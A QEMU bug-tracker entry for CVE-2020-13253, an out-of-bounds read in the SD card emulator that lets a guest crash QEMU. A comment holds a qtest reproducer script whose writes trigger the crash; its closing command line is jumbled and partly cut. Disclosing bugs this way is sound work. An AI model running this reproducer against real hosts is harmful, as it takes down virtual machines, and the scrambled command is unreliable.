CVE-2020-13253 QEMU: sd: OOB access could crash the guest resulting in DoS
Bug #1880822 reported by
P J P
This bug affects 1 person
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
QEMU |
Fix Released
|
Undecided
|
Philippe Mathieu-Daudé |
Bug Description
An out-of-bounds read access issue was found in the SD Memory Card emulator of the QEMU. It occurs while performing block write commands via sdhci_write(), if a guest user has sent 'address' which is OOB of 's->wp_groups'. A guest user/process may use this flaw to crash the QEMU process resulting in DoS.
CVE References
Changed in qemu: | |
status: | New → Confirmed |
Changed in qemu: | |
status: | Fix Committed → Fix Released |
To post a comment you must log in.
#!/bin/sh
cat << EOF > inp 00000ff03 6c6c6c6762e4c5e 0bc603040000000 000e10200110000 02c496de02c58
outl 0xcf8 0x80001810
outl 0xcfc 0xe1068000
outl 0xcf8 0x80001814
outl 0xcf8 0x80001804
outw 0xcfc 0x7
outl 0xcf8 0x8000fa20
write 0xe106802c 0x1 0x6d
write 0xe106800f 0x1 0xf7
write 0xe106800a 0x6 0x9b4b9b5a9b69
write 0xe1068028 0x3 0x6d6d6d
write 0xe106800f 0x1 0x02
write 0xe1068005 0xb 0x055cfbffffff0
write 0xe106800c 0x1d 0x050bc6c6c6c6c
write 0xe1068003 0xd 0x2b6de02c3a6de
EOF
../bin/ qemu-system- x86_64 -qtest stdio -enable-kvm -monitor none \ sd-spec- version= 3 \ drive=mydrive -nographic \ 0,file= null-co: //,format= raw,id= mydrive < inp
-serial none -M pc-q35-5.0 -device sdhci-pci,
-device sd-card,
-drive if=sd,index=